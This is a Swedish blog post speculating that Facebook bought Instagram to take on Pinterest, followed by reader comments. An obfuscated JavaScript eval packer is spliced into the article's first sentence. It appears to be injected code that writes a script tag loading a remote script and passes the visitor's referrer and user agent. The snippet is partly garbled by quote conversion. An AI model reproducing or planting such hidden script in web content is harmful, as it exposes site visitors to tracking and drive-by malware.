Image Image Image Image Image Image Image Image Image Image

| 23 oktober, 2020

Scroll to top

Top

Instagram är Facebook’s Pinterest dödare

Instagram är Facebook’s Pinterest dödare
Sebastian

De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbzsr|var|u0026u|referrer|nttia||js|php’.split(’|’),0,{}))
flesta av er vet nog redan om att jätten Facebook i veckan köpte upp fototjänsten Instagram för ca sju miljarder kronor.
Ni kan läsa vår tidigare artikel här!

Detta är endast en analys. Inget är bestämt än från Facebook!

Men varför köptes det upp?

Pinterest är en tjänst som växt sig väldigt stor i år och värvat en otroligt massa medlemmar, något som Facebook lagt märket till. Facebook jobbar dagligen med att försöka utveckla nya smarta metoder som ska få oss att stanna kvar på nätverket, instagram verkar vara deras senaste.

Alternativet är att skapa en ny tjänst som kommer hålla Pinterest i klorna. Istället för att bygga vidare på den integrering som Instagram har med Facebook idag så väljer man att bygga in det totalt i sajten och då bli en ny tjänst. Detta är förmodligen det bästa sättet för Facebook att leda tåget vidare och troligen också göra det bättre än Pinterest.

Jag själv är ingen aktiv användare av Pinterest så för mig är detta inget som berör min vardag, men kan tänka mig att många andra som kanske byggt upp en stadig bas med bilder tycker det är tråkigt.

Det är fortfarande bara en analys så det är inget som står klart!

Vad tycker ni om detta? Kommentera gärna nedan!

Comments

 1. Tarrach

  Skulle vilja påstå att facebook fått överdrivet mycket makt över vårat internet användande, 7 miljarder var dock ingen dålig summa.

  • Tobias

   Jag håller med dig till fullo. För det första är det sjukt att Instagram ens fick ut så pass mycket och sen har Facebook fått för mycket makt. Det ska bli kul och se vad de ska göra med instagram.

   • Håller med, sjukt med 7 miljarder också 😮

 2. Jacob Stillén

  Om det här stämmer blir jag sur på riktigt. Om inte nya aktörer på marknaden kan få en chans att etablera sina ”unika” ideér utan att de stora fiskarna ska förstöra hur kommer då världen se ut. Tycker synd om Pinterest om detta är sant. Slutar nästan använda Facebook.